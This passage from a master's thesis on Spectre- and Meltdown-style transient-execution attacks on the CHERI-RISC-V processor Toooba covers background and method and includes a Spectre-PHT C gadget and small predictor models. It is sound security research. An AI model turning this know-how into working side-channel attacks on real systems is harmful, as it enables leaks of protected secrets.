
DEGREE PROJECT IN COMPUTER SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS

STOCKHOLM, SWEDEN 2021

Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V Microprocessor Toooba

FRANZ ANTON FUCHS

KTH ROYAL INSTITUTE OF TECHNOLOGY

SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

Master in Computer Science

Date: January 27, 2021

Supervisor: Roberto Guanciale

Examiner: Mads Dam

School of Electrical Engineering and Computer Science

Host Organisation: University of Cambridge Department of Computer Science and Technology

Swedish title: Analys av transient-execution attacker på out-of-order CHERI-RISC-V mikroprocessorn Toooba

Copyright © 2021 by Franz Anton Fuchs

All rights reserved. No part of this work may be reproduced or used in any manner without written permission of the copyright owner except for the use of quotations.

Abstract

Research in recent years has identified transient-execution attacks as a major threat to microarchitectures. In this work, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchitectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. I conduct the transient-execution experiments for this work on Toooba, a superscalar out-of-order processor implementing CHERI-RISC-V. I present a new subclass of transient-execution attacks dubbed Meltdown-CF (Capability Forgery). Furthermore, I reproduce all four major Spectre-style attacks and important Meltdown-style attacks. This work analyses all attacks and explains the outcome of the respective experiments based on the architectural and microarchitectural decisions made by the cores' developers. While all four Spectre-style attacks could be successfully reproduced, the cores do not appear to be vulnerable to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB, as well as the newly developed transient-execution attack subclass Meltdown-CF, pose a large threat to CHERI systems. However, all four major Spectre-style attacks and all attacks of the Meltdown-CF subclass violate CHERI's security model and therefore require security mechanisms to be put in place.

Sammanfattning (Summary)

Transient-execution attacks have constituted a major threat to microarchitectures in the research of recent years. In this thesis, I reproduce and develop transient-execution attacks against RISC-V and CHERI-RISC-V microarchitectures. CHERI is an instruction set architecture (ISA) security extension that provides fine-grained memory protection and compartmentalisation. In the thesis, I carry out transient-execution experiments on Toooba, a superscalar out-of-order processor that implements CHERI-RISC-V. I present a new kind of transient-execution attack called Meltdown-CF (Capability Forgery). In addition, I have reproduced the four major Spectre-style attacks and important Meltdown-style attacks. In the thesis, I analyse these attacks and explain the results of the experiments based on the architectural and microarchitectural decisions made by the respective developers. While the four Spectre-style attacks could be reproduced successfully, the processor cores do not appear to be vulnerable to earlier Meltdown-style attacks. I conclude that Spectre-BTB and Spectre-RSB, as well as the new kind of transient-execution attack Meltdown-CF, pose a major threat to CHERI systems. However, the four major Spectre-style attacks and all attacks of the Meltdown-CF type violate CHERI's threat model and therefore require security mechanisms to be put in place.

Acknowledgements

I would like to thank:

• Simon W. Moore, my supervisor at Cambridge, who, even though the circumstances were not in our favour, believed in me and gave me the opportunity to conduct my work remotely. Furthermore, he provided lots of feedback throughout close and regular supervision sessions.

• Jonathan Woodruff, my advisor, who spent many hours explaining various concepts to me, was always happy to discuss my ideas, and provided feedback and inspirations that heavily impacted my work.

• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas, and others who assisted me in solving a wide range of problems and made me rethink my approaches and ideas.

• Robert N. M. Watson and the entire CHERI team who warmly welcomed me into the team and created a helpful and encouraging atmosphere.

• Roberto Guanciale, my supervisor at KTH, who made it possible to conduct this thesis work within the CHERI group and supported me through the entire process by providing important high-level feedback.

Contents

1 Introduction
1.1 Research Question and Scope
1.2 Contributions
1.3 Figures and Permissions
1.4 Outline

2 Background
2.1 Microarchitectural Background
2.1.1 RISC-V
2.1.2 Caches and Memory
2.1.3 Out-of-order Execution
2.1.4 Speculative Execution
2.1.5 Memory Disambiguation
2.2 Transient-Execution Attacks
2.2.1 Spectre Attacks
2.2.2 Meltdown Attacks
2.2.3 Timing Side Channels
2.3 Security Mechanisms
2.3.1 Tagging Microarchitectural State
2.3.2 Special Instructions
2.4 CHERI
2.4.1 CHERI Abstract Model
2.4.2 CHERI-RISC-V
2.4.3 CHERI-RISC-V Hardware
2.4.4 CHERI Software Stack
2.4.5 CHERI Security Model
2.5 Related Work

3 Methods
3.1 Toooba
3.2 Research Methodology
3.3 Common Mechanisms
3.3.1 Flushing Caches
3.3.2 Timing Measurements

4 RISC-V Results
4.1 Spectre Attacks
4.1.1 Spectre-PHT
4.1.2 Spectre-PHT-Write
4.1.3 Spectre-BTB
4.1.4 Spectre-RSB
4.1.5 Spectre-STL
4.2 Meltdown Attacks
4.2.1 Meltdown-US
4.2.2 Meltdown-GP

5 CHERI-RISC-V Results
5.1 Spectre Attacks
5.1.1 Spectre-PHT
5.1.2 Spectre-PHT-CHERI-Write
5.1.3 Spectre-BTB on CHERI-Sandboxes
5.1.4 Priv-Mode Attacks
5.1.5 Spectre-RSB
5.1.6 Spectre-STL
5.2 Meltdown Attacks
5.2.1 Meltdown-US-CHERI
5.2.2 Meltdown-GP-CHERI
5.2.3 Meltdown-CF

6 Discussion
6.1 SinglePCC
6.1.1 Mechanism
6.1.2 Testing SinglePCC
6.1.3 Hardening SinglePCC
6.1.4 Spectre-BTB in Kernel Code
6.2 Preventing Meltdown-CF
6.3 Ethics and Sustainability
6.4 Future Work

7 Conclusions

Bibliography

A Full C Attack

B Full CHERI-RISC-V Attack

Acronyms

ABI Application Binary Interface

ALU Arithmetic Logic Unit

ASID Address Space Identifier

ASR Access System Registers

BHT Branch History Table

BOOM Berkeley Out-of-Order Machine

BTB Branch Target Buffer

CHERI Capability Hardware Enhanced RISC Instructions

CID CHERI Compartment Identifier

CISC Complex Instruction Set Computing

CSR Control and Status Register

DDC Default Data Capability

FPGA Field Programmable Gate Array

FPU Floating Point Unit

HDL Hardware Description Language

ILP Instruction-Level Parallelism

IR Intermediate Representation

ISA Instruction-Set Architecture

LFB Line Fill Buffer

LLC Last Level Cache

LSB Least Significant Bit

LSQ Load-Store Queue

MMU Memory Management Unit

MSB Most Significant Bit

PCC Program Counter Capability

PHT Pattern History Table

PTE Page Table Entry

RAS Return Address Stack

RIDL Rogue In-Flight Data Load

RISC Reduced Instruction Set Computing

ROB Reorder Buffer

ROP Return-Oriented Programming

RSB Return Stack Buffer

SCR Special Capability Register

STL Store-To-Load

SUM Supervisor User Memory

TLB Translation Lookaside Buffer

Chapter 1

Introduction

Memory safety in general has been one of the most difficult security problems in the secure computing world. The Heartbleed bug gives a good example of the severity of memory safety problems and explains the need for strong memory safety [1]. One approach to mitigate these kinds of attacks is Cyclone, a dialect of C that aims to achieve memory safety [2]. Similar approaches are CCured [3], which aims to enhance the type safety of C programs, and Checked C [4], which helps to guarantee spatial memory safety for C programs.

Another approach to implement memory safety is in-memory capability systems, which require memory accesses to go through capabilities in place of integer addresses. The idea of capability systems is not new; it has existed for more than forty years, e.g., in the CAP Computer [7] or Ackerman's architecture [8]. However, capability systems have never been commercially successful. The CHERI project, which started in 2010, revived the idea of capability systems and had a large impact on the field. The main idea of CHERI is to effectively ensure spatial and temporal memory safety. CHERI systems can mitigate attacks targeting spatial or temporal memory safety vulnerabilities. However, in January 2018, a new class of attacks called transient-execution attacks was published. These attacks had a major impact on the processor industry and pose a large threat to CHERI systems, as they can circumvent the security mechanisms in place. Transient-execution attacks have only partly been evaluated on RISC-V systems and not at all on CHERI-RISC-V systems. Therefore, the question remains whether these attacks are also possible on RISC-V and CHERI-RISC-V systems, which this thesis aims to answer.

1.1 Research Question and Scope

The main research question evaluated throughout the course of this thesis is: Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient-execution attacks? In order to answer that question, I attempt to reproduce all major transient-execution attacks on both RISC-V and CHERI-RISC-V. This work is limited to attacks in which transiently executed instructions reveal secrets. Attacks that infer information about the program's state without transient execution, e.g., BranchScope [9], are not part of this thesis work.

Developing and implementing mitigation mechanisms is out of scope. However, it is part of this work to point out possible mechanisms that can be implemented. Furthermore, I consider it in scope to test whether existing mitigation mechanisms effectively mitigate transient-execution attacks. A thorough evaluation of mitigation mechanisms, including a performance analysis and a comparison of the advantages and drawbacks of each mechanism, is out of scope.

1.2 Contributions

In this work, I make the following contributions:

• The first work to completely reproduce the major transient-execution attacks on a RISC-V microarchitecture.

• The first work to reproduce the major transient-execution attacks on a CHERI-RISC-V microarchitecture.

• The development of the new subclass of Meltdown-CF attacks.

• The development of an extensible framework for exploring transient-execution attacks, which also serves as a platform to research mitigation mechanisms in RISC-V and CHERI-RISC-V microarchitectures.

• The testing and hardening of the SinglePCC implementation in Toooba.

1.3 Figures and Permissions

All figures with a citation are used with the permission of the publisher. Figures without a citation were created by myself.

1.4 Outline

In Chapter 2, I explain the background of this thesis work, including modern microarchitectures, transient-execution attacks, and the CHERI-RISC-V architecture. In Chapter 3, I present the research methods applied in the course of this thesis. Chapter 4 and Chapter 5 give an overview of the attacks included in the framework for RISC-V and CHERI-RISC-V microarchitectures, respectively. Chapter 6 discusses the results and their implications. Chapter 7 concludes the thesis.

Chapter 2

Background

In this chapter, I introduce the microarchitectural background of transient-execution attacks followed by the attacks themselves. Next, I describe CHERI systems, which will be the basis for the research done throughout the thesis work.

2.1 Microarchitectural Background

Microarchitectures use sophisticated mechanisms to improve overall performance. In industry, the focus has been on performance rather than security. This led to the emergence of transient-execution attacks, which exploit these mechanisms. This section describes RISC-V and the microarchitectural mechanisms that form the basis for transient-execution attacks.

2.1.1 RISC-V

RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA) that has received a great deal of attention in academia and is gaining traction in industry. An ISA describes an abstract model of the computer including the architectural state of the machine, instructions to change the state, registers, memory access, and other input/output specifications. It is important to distinguish between the terms architecture and microarchitecture. A microarchitecture is an implementation of an architecture. Therefore, binary compatibility exists between microarchitectures that implement the same architecture. A program causes visible changes to the architectural state, but the microarchitectural state is mainly invisible to the program.

The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architecture, which means that it aims to have a small set of instructions where each instruction performs only one task. In contrast, instructions on Complex Instruction Set Computing (CISC) architectures can perform several operations within a single instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS and ARM, but it differs mainly because of its modular nature. The unprivileged specification [11], which covers the user-space instructions, describes a minimal instruction set, the base integer instruction set, that has to be implemented on all microarchitectures, together with several optional extensions. This is the reason why RISC-V is considered a design space.

The current unprivileged specification defines 13 extensions [11]. Widely implemented are the standard extensions for integer multiplication and division, atomic instructions, single-precision floating-point, double-precision floating-point, and compressed instructions. RISC-V extensions are abbreviated with capital letters, e.g., A for the standard extension for atomic instructions. Furthermore, RISC-V defines three different register bit widths: 32, 64, and 128 bits. RISC-V microprocessors have a name tag to specify which extensions and features of RISC-V they implement, e.g., RV32IACMU, where RV32 stands for RISC-V with 32-bit registers and all following capital letters identify the instruction set extensions this microprocessor implements. The capital letter G refers to the general-purpose ISA, which comprises the integer, multiplication and division, atomic, single-precision floating-point, and double-precision floating-point extensions, abbreviated as "IMAFD".
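The name-tag scheme described above can be illustrated with a small parser. This is only a sketch under simplifying assumptions: the type `rv_tag` and the function `rv_parse_tag` are hypothetical names, only single-letter tags of the form RV<width><letters> are handled, and G is expanded to IMAFD exactly as stated in the text.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper type: decoded form of a tag such as "RV32IACMU". */
struct rv_tag {
    int  xlen;      /* register width: 32, 64, or 128 */
    bool ext[26];   /* ext[c - 'A'] is true if capital letter c is present */
};

/* Parses RV<width><letters>; returns false on malformed input. */
bool rv_parse_tag(const char *tag, struct rv_tag *out)
{
    memset(out, 0, sizeof *out);
    if (strncmp(tag, "RV", 2) != 0 || !isdigit((unsigned char)tag[2]))
        return false;

    char *end;
    long width = strtol(tag + 2, &end, 10);
    if (width != 32 && width != 64 && width != 128)
        return false;
    out->xlen = (int)width;

    for (const char *p = end; *p != '\0'; p++) {
        if (!isupper((unsigned char)*p))
            return false;
        if (*p == 'G') {
            /* G stands for the general-purpose set IMAFD. */
            for (const char *g = "IMAFD"; *g != '\0'; g++)
                out->ext[*g - 'A'] = true;
        } else {
            out->ext[*p - 'A'] = true;
        }
    }
    return true;
}
```

For example, parsing "RV64G" with this sketch marks the letters I, M, A, F, and D as present and sets the width to 64.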

The RISC-V privileged specification [12] defines three privilege modes: M(achine), S(upervisor), and U(ser). One additional privilege mode might be added in the future, as one encoding is reserved in the specification. Machine mode is the highest privilege level and user mode the lowest. As with the base integer instruction set, every RISC-V implementation needs to implement machine mode. Whether the other modes are implemented is an implementation choice. When supervisor mode is implemented, this is indicated by an S in the name tag. For user mode, the letter U is added to the name tag. In machine mode, addresses are interpreted as physical addresses. In supervisor mode, address translation is conducted. The main information for address translation, e.g., the Address Space Identifier (ASID), is stored in satp, the supervisor address translation and protection register. The privileged specification [12] specifies 32-bit, 39-bit, and 48-bit wide virtual addresses.
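To make the role of satp more concrete, the following sketch splits a 64-bit satp value into its fields. It assumes the RV64 layout of the privileged specification (MODE in bits 63 to 60, ASID in bits 59 to 44, PPN in bits 43 to 0); the struct and function names are illustrative and not taken from the thesis.

```c
#include <stdint.h>

/* Illustrative view of the RV64 satp fields. */
struct satp_fields {
    unsigned mode;   /* 0 = Bare (no translation), 8 = Sv39, 9 = Sv48 */
    unsigned asid;   /* Address Space Identifier */
    uint64_t ppn;    /* physical page number of the root page table */
};

struct satp_fields satp_decode(uint64_t satp)
{
    struct satp_fields f;
    f.mode = (unsigned)(satp >> 60) & 0xFu;       /* bits 63..60 */
    f.asid = (unsigned)(satp >> 44) & 0xFFFFu;    /* bits 59..44 */
    f.ppn  = satp & ((UINT64_C(1) << 44) - 1);    /* bits 43..0  */
    return f;
}
```

On RV32 the register is only 32 bits wide and uses a different field layout, which this sketch does not cover.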

Machine mode and supervisor mode define additional special-purpose registers, which are called Control and Status Registers (CSRs) in RISC-V. These registers are used to obtain information about the microarchitecture, but also to control the architecture, e.g., trap handling. The chapters Machine-Level ISA and Supervisor-Level ISA of the privileged specification [12] contain further information on exception handling and related topics.

2.1.2 Caches and Memory

DRAM accesses are slow compared to the clock speed of the processor. If every load issued by the processor had to pay the full DRAM access penalty, performance would decrease significantly. This creates the need for low-latency memory. One solution is caches, which hold the most recently accessed data. Access times to these data are short, but access times to data that are not stored in a cache remain long. Modern processors have multiple cache levels that differ in size, speed, and cost. The Level-1 (L1) cache has the fastest access time, but is also the smallest. The cache on the highest level, also referred to as the Last Level Cache (LLC), has the slowest access time, but can store the most data. In general, the greater the level number, the slower the access becomes, but the more data the cache can store. Caches store memory in the form of cache lines. One cache line contains multiple adjacent memory words. Many modern processors have inclusive caches, which means that every cache line stored in a lower level is also present in every cache level above it. In modern multi-core processors, every core typically has its own L1 cache, and the LLC, the slowest and biggest cache, is shared among all cores. The intermediate caches may be private to a core or shared, depending on the design choices of the manufacturer. Furthermore, caches are well suited to exploit the principle of locality, which programs exhibit. Temporal locality describes the situation in which a program accesses memory at the same address more than once, and spatial locality is shown when the program accesses memory at addresses near an address it has already accessed. By storing the cache lines of the most recently accessed data, caches improve performance for programs that exhibit both temporal and spatial locality.
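The notion of a cache line can be made concrete by splitting an address into tag, set index, and line offset. The sketch below assumes an illustrative geometry of 64-byte lines and 64 sets; these numbers and all names are assumptions for the example and do not describe the caches of any particular core.

```c
#include <stdint.h>

/* Illustrative geometry, not taken from the thesis. */
#define LINE_BYTES 64u
#define NUM_SETS   64u

struct cache_addr {
    uint64_t tag;      /* identifies the line within its set */
    unsigned set;      /* which set the line maps to */
    unsigned offset;   /* byte position inside the line */
};

struct cache_addr cache_split(uint64_t addr)
{
    struct cache_addr c;
    c.offset = (unsigned)(addr % LINE_BYTES);
    c.set    = (unsigned)((addr / LINE_BYTES) % NUM_SETS);
    c.tag    = addr / LINE_BYTES / NUM_SETS;
    return c;
}

/* Two addresses share a cache line when everything above the offset
 * matches; this is the case that spatial locality benefits from. */
int same_line(uint64_t a, uint64_t b)
{
    return a / LINE_BYTES == b / LINE_BYTES;
}
```

With this geometry, the addresses 0x1000 and 0x103F fall into the same line, whereas 0x1040 already belongs to the next one.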

2.1.3 Out-of-order Execution

A microprocessor executes a program, which is defined by a sequence of instructions as written by the programmer. This order of instructions defines the program's behaviour and is called in-order or program-order. Simple microprocessors execute instruction by instruction following this order. However, modern microprocessors incorporate out-of-order execution, which means that instructions are microarchitecturally not executed in program order. This is used to enhance performance. The principle of out-of-order execution is based on the fact that instructions that do not depend on each other can be executed in parallel and in arbitrary order, as the final result will not change. The first algorithm for full out-of-order execution was demonstrated by Tomasulo [13].

The main goal of modern processors is to hide the latency of instructions, e.g., loads and stores that miss the L1 data cache, and to extract Instruction-Level Parallelism (ILP) by executing other independent instructions in the meantime. This increases the overall performance of the microprocessor. Out-of-order execution increases the divergence between the architectural and the microarchitectural state. An instruction becomes visible when it changes the architectural state. Instructions must become visible in program order; otherwise, the new state diverges from a valid architectural state, which means that the program behaves differently. An instruction retires, also called commits, in the cycle in which it changes the architectural state. Instructions commit in sequential order, matching the programmer's model presented in the ISA.
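The in-order commit rule can be sketched with a strongly simplified reorder-buffer model. The function name `rob_commit` and the representation of the buffer as a plain array of completion flags are assumptions made for illustration; a real core additionally limits how many instructions commit per cycle.

```c
#include <stdbool.h>
#include <stddef.h>

/* done[i] is true once instruction i (numbered in program order) has
 * finished executing, possibly out of order. head is the oldest
 * instruction that has not committed yet. Returns the new head:
 * commit stops at the first instruction that is still executing. */
size_t rob_commit(const bool *done, size_t n, size_t head)
{
    while (head < n && done[head])
        head++;
    return head;
}
```

If instructions 0, 2, and 3 have finished but instruction 1 has not, only instruction 0 commits; instructions 2 and 3 stay invisible to the architectural state until instruction 1 completes.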

2.1.4 Speculative Execution

An important performance criterion is to keep the processor's pipeline filled at all times. For that, the processor needs to fetch the correct instructions. The control flow of a program depends on multiple parameters, including user input. Control flow is steered by direct and indirect branches in machine code. A direct branch is a jump to an address that is determined by an offset encoded in the branch instruction. An indirect branch is a jump to an address stored in a register. In order to fetch the correct instructions, the microprocessor would need to know whether a branch is taken and what its jump target is, which is not possible at fetch time. Therefore, modern processors use branch prediction: the processor predicts the information it needs. Following its prediction, the processor executes the instructions it expects to be correct. If the prediction turns out to be right, meaning that the predicted values match the program's real values, the instructions can commit. Otherwise, the instructions need to be rolled back. Therefore, speculative execution is not visible on the architectural level. If the microprocessor's speculation is successful, this can lead to a large performance gain. A speculative microprocessor has special units that handle prediction. These units differ in the kinds of branches they are responsible for predicting.

Branch Predictors

Branch prediction can be either static or dynamic. A static branch predictor always makes the same decision and does not change during the runtime of a program. A dynamic branch predictor, on the other hand, may change its prediction as it learns at runtime. I will focus on dynamic branch prediction as it is the most widely used technique in modern microprocessors. A branch predictor mainly consists of two subunits. The Pattern History Table (PHT) stores the history of a particular branch. Using that information, the processor predicts whether the branch is taken or not. A PHT can be either local or global. A local PHT stores only the history of a single branch, e.g., strongly taken, whereas a global PHT also takes other branches and their outcomes into account. The processor also has a Branch Target Buffer (BTB), which stores the branch target, i.e., the location that the control flow will go to if the branch is taken. A microprocessor can also implement both local and global PHTs and choose which one to use at runtime depending on the misprediction ratio. This is called a Tournament Predictor [14].
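A common textbook realisation of a local PHT entry is a two-bit saturating counter, which matches states such as "strongly taken" mentioned above. The following sketch assumes this scheme together with a hypothetical table size and index function; it is not a description of the predictor implemented in Toooba.

```c
#include <stdbool.h>
#include <stdint.h>

#define PHT_ENTRIES 1024u   /* illustrative table size */

/* Counter states: 0 strongly not taken, 1 weakly not taken,
 * 2 weakly taken, 3 strongly taken. */
static uint8_t pht[PHT_ENTRIES];

/* Hypothetical index function: drop the low address bits and wrap. */
static unsigned pht_index(uint64_t pc)
{
    return (unsigned)((pc >> 2) % PHT_ENTRIES);
}

bool pht_predict(uint64_t pc)
{
    return pht[pht_index(pc)] >= 2;
}

/* Called once the real outcome of the branch is known. */
void pht_update(uint64_t pc, bool taken)
{
    uint8_t *c = &pht[pht_index(pc)];
    if (taken && *c < 3)
        (*c)++;
    else if (!taken && *c > 0)
        (*c)--;
}
```

Because the counter saturates, a branch that has been trained to one of the strong states keeps its prediction after a single deviating outcome, which is the property that training-based attacks rely on.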

In most microprocessors, branch prediction covers all direct and indirect branch instructions with the exception of call and return instructions. These are handled in separate logic, as presented in the paragraph below. However, instances of both instructions can also be placed in the BTB, e.g., as a mitigation mechanism against attacks or because the microprocessor does not have dedicated logic for these two instructions.

Return Stack Buffers

A Return Stack Buffer (RSB), also called Return Address Stack (RAS), is a hardware buffer for return addresses. For every call to a function, the return address is pushed onto this hardware stack. Every return instruction pops one return address. The return address is also stored on the software stack. The main goal of an RSB is to enhance performance. Loading the return address from the software stack can lead to stall cycles, e.g., because the branch needs to be taken early in the pipeline and the load can only be performed later in the pipeline. Therefore, microprocessors use an RSB to predict the return address and keep the pipeline filled with instructions. If the addresses from the RSB and the software stack match, a performance gain is achieved. Otherwise, speculatively executed instructions need to be rolled back.
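The push and pop behaviour of an RSB can be sketched as a small circular buffer. The depth of eight entries, the wrap-around policy, and the names `rsb_push` and `rsb_pop` are assumptions for illustration; actual implementations differ in how they treat overflow and underflow.

```c
#include <stdint.h>

#define RSB_ENTRIES 8u   /* illustrative depth */

struct rsb {
    uint64_t entry[RSB_ENTRIES];
    unsigned top;    /* number of pushes minus pops, used modulo the depth */
};

/* On a call: remember the address of the instruction after the call. */
void rsb_push(struct rsb *r, uint64_t return_addr)
{
    r->entry[r->top % RSB_ENTRIES] = return_addr;
    r->top++;
}

/* On a return: predict the most recently pushed address. */
uint64_t rsb_pop(struct rsb *r)
{
    r->top--;
    return r->entry[r->top % RSB_ENTRIES];
}
```

In this sketch, a ninth nested call overwrites the oldest entry, so the matching return for the first call is predicted with a stale address and the speculatively executed instructions have to be rolled back.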

    sd t0, 0(a0)    # store t0 to the address held in a0
    ld t1, 0(a1)    # load t1 from the address held in a1

Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1 resolve to the same physical address.

2.1.5 Memory Disambiguation

When reordering instructions, the microprocessor has to ensure that it does not break any dependencies. For a store and a load operation, a true dependency exists if the load returns the value that was written to memory by a preceding store, i.e., both operations access the same address. The store and load operations shown in Figure 2.1 are dependent if a0 and a1 resolve to the same physical address. The process of detecting true dependencies between memory operations is called memory disambiguation. However, at the point of reordering instructions, the microprocessor might not know the full addresses yet, e.g., because they are loaded from memory and these loads have not finished yet, or because the register is being updated and will be made available on a forwarding path. Therefore, the microprocessor cannot guarantee that these instructions are independent. However, in order to achieve high performance, loads have to be executed as early as possible such that a possible miss penalty can be hidden. Modern microprocessors therefore use memory disambiguation with speculation, as first presented by Gallagher et al. [16]. The microprocessor assumes that the load is not dependent on the store and speculatively executes the load and the instructions dependent on it before the store. When the address of the store is resolved, the microprocessor checks whether there is in fact a dependency and, if so, re-executes the load and its dependent instructions.
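The check that is performed once the store address resolves can be sketched as an overlap test between two byte ranges. The struct `mem_op` and both function names are hypothetical; a real load-store queue performs this comparison in hardware across all in-flight loads.

```c
#include <stdbool.h>
#include <stdint.h>

struct mem_op {
    uint64_t addr;   /* physical address, valid once resolved */
    unsigned size;   /* access size in bytes */
};

/* True if the byte ranges [addr, addr + size) of both accesses overlap. */
bool ranges_overlap(struct mem_op a, struct mem_op b)
{
    return a.addr < b.addr + b.size && b.addr < a.addr + a.size;
}

/* Called when the address of an older store resolves after a younger
 * load has already executed speculatively. Returns true if the load
 * read stale data and must be re-executed with its dependents. */
bool load_needs_replay(struct mem_op resolved_store,
                       struct mem_op speculated_load)
{
    return ranges_overlap(resolved_store, speculated_load);
}
```

For the instruction pair of Figure 2.1, the load has to be replayed exactly when the eight bytes written through a0 overlap the eight bytes read through a1.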

2.2 Transient-Execution Attacks

Transient instructions are instructions that are erroneously executed by the processor due to out-of-order or speculative execution but would not have been executed otherwise. Transient execution is not visible on the architectural level because transient instructions are rolled back and never commit to the architectural state. However, transient execution has effects on the microarchitectural state. These state changes can be read through side channels. This is the basis of transient-execution attacks. They trick the microprocessor into executing several instructions transiently and then gain knowledge through side channels. The most commonly used side channel for transient-execution attacks is timing. Other side channels exist, such as power consumption or heat dissipation, but in this work I only use timing side channels. This choice is supported by publications on transient-execution attacks, in which timing side channels have proved to be effective [18, 19, 20]. Transient-execution attacks can be subdivided into Spectre attacks and Meltdown attacks [19]. More sophisticated classifications [20] exist, but are not needed for this thesis work.
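Reading a microarchitectural state change through a timing side channel usually ends with a decoding step: the attacker measures the access time of every candidate location and picks the one that looks cached. The sketch below shows only this decoding step on already measured latencies; the function name and the threshold parameter are assumptions, and obtaining the measurements is platform-specific.

```c
#include <stddef.h>
#include <stdint.h>

/* latency[i] is the measured access time, in cycles, of candidate i.
 * Returns the index of the fastest candidate if it is faster than
 * threshold (a likely cache hit), or -1 if no candidate looks cached. */
int fastest_slot(const uint64_t *latency, size_t n, uint64_t threshold)
{
    int best = -1;
    uint64_t best_time = threshold;
    for (size_t i = 0; i < n; i++) {
        if (latency[i] < best_time) {
            best_time = latency[i];
            best = (int)i;
        }
    }
    return best;
}
```

The threshold separating hits from misses has to be calibrated for the machine under test, since it depends on the cache and memory latencies.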

2.2.1 Spectre Attacks

Spectre Attacks focus on microarchitectural state changes due to misprediction

of control or data flow. Spectre attacks were first demonstrated by Kocher et

al. [22]. They can further be subdivided into four categories regarding which

part of speculative execution they seek to exploit.

Spectre-PHT

Following the name, Spectre-PHT aims to attack the Pattern History Table.

The basic attack principle is to train the history of a branch such that the

prediction’s outcome follows the attacker’s intentions. A simple example – derived

from [22] – is shown in Figure 2.2. The if statement will result in a branch

instruction. The first step of the attacker is to train the PHT of this branch

such that it is strongly predicted as not taken, which means that the condition

is predicted to evaluate to true. This can be accomplished by calling the code with this

if statement with values for the index i that are less than array_size. The

next step is to conduct the actual attack. The attacker can provide any desired

value for i as the branch prediction will speculatively execute the body of the

if statement. Therefore, the attacker can trick the microprocessor into

executing an arbitrary load without checking the bounds in the first place. Using the

data retrieved from the load to sec_arr as an index to a user accessible array

usr_arr will change the microarchitectural state. Later, the microprocessor

will detect the misprediction and roll back the instructions. However, microar-

chitectural side effects have already taken place and stay visible even though

none of the speculatively executed instructions committed. Spectre-PHT is

also known as Spectre v1 and presented as such in [22].

int j;
int r = 0;
if (i < array_size)
{
    j = sec_arr[i];
    r = usr_arr[j];
}

Figure 2.2: Spectre-PHT example written in C.
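
The training and attack phases described above can be illustrated with a small software model. This is only a sketch under stated assumptions: the 2-bit saturating counter, the names pht_counter and body_runs_transiently, and the rule that states 0 and 1 predict "not taken" are hypothetical and do not describe the predictor of any particular microprocessor.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical 2-bit saturating counter: states 0 and 1 predict
   "not taken", states 2 and 3 predict "taken". */
typedef struct { unsigned state; } pht_counter;

/* Prediction made before the branch condition is resolved. */
static bool pht_predict_taken(const pht_counter *c) { return c->state >= 2; }

/* Update with the resolved outcome, saturating at 0 and 3. */
static void pht_update(pht_counter *c, bool taken) {
    assert(c->state <= 3);
    if (taken) { if (c->state < 3) c->state++; }
    else       { if (c->state > 0) c->state--; }
}

/* The branch generated for `if (i < array_size)` is taken (the body is
   skipped) exactly when the index is out of bounds. */
static bool bounds_branch_taken(unsigned i, unsigned array_size) {
    return i >= array_size;
}

/* Returns true if the body of the if statement would run transiently:
   the branch is predicted not taken although i is out of bounds. */
static bool body_runs_transiently(pht_counter *c, unsigned i, unsigned array_size) {
    bool predicted_taken = pht_predict_taken(c);
    bool actual_taken = bounds_branch_taken(i, array_size);
    pht_update(c, actual_taken);
    return !predicted_taken && actual_taken;
}
```

Calling body_runs_transiently a few times with an in-bounds index drives the counter to "strongly not taken"; a following call with an out-of-bounds index then reports a transient execution of the body.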

Spectre-BTB

In contrast to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A

BTB has only a limited number of entries. Therefore, the address of

a branch instruction has to be mapped to an entry by a hash function. In the

original form as demonstrated by Kocher et al. [22] the small size of the BTB is

exploited by attackers. Because of the small size of the BTB, the hash function

can lead to frequent collisions. When a branch is seen by the microprocessor, it

looks up the corresponding entry in the BTB and uses this target address for the

prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the

attacker injects a malicious branch target into the BTB at the entry of a branch

executed by the victim program. Figure 2.3 shows two branch instructions,

which I assume to be mapped to the same BTB entry. The injection can be done

by executing the second branch instruction, which will overwrite the entry of

the first one. In the second phase, the attacker triggers the first instruction

to be executed. Speculatively, the branch target address in the BTB entry –

which is the branch target of the second branch instruction – will be used and

the control-flow will be speculatively directed there. This target is attacker

controlled and will leak the desired information. This variant is called out-of-

place Spectre-BTB.

Another variant is in-place Spectre-BTB. In this case, only one branch

instruction is used. The attacker manages, e.g. by user input, to poison the

BTB entry of this branch instruction. The next time the code with this branch

instruction is executed, the branch prediction will direct the control-flow

speculatively to attacker-intended code, which the attacker can use to leak

information. Spectre-BTB is also known as Spectre v2 and presented as such in [22].

00000008: 00060067 jr a2

...

00001008: 00078067 jr a5

Figure 2.3: Indirect jumps mapped to the same BTB entry.
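
A minimal sketch of out-of-place injection, assuming a direct-mapped BTB without tag comparison. The size of 1024 entries and the index function (drop the two low address bits, keep the low index bits) are assumptions chosen so that the two addresses of Figure 2.3 collide; they are not taken from any real microarchitecture.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define BTB_ENTRIES 1024u /* assumed size, must be a power of two */

typedef struct { uint64_t target; int valid; } btb_entry;
typedef struct { btb_entry e[BTB_ENTRIES]; } btb;

/* Assumed index function: no tag is stored, so distinct branch
   addresses with equal index bits share one entry. */
static unsigned btb_index(uint64_t pc) {
    return (unsigned)((pc >> 2) & (BTB_ENTRIES - 1u));
}

/* Executing an indirect jump at pc records its resolved target. */
static void btb_update(btb *b, uint64_t pc, uint64_t target) {
    btb_entry *e = &b->e[btb_index(pc)];
    e->target = target;
    e->valid = 1;
}

/* Returns 1 and writes the predicted target if the entry is valid. */
static int btb_predict(const btb *b, uint64_t pc, uint64_t *target) {
    assert(target != NULL);
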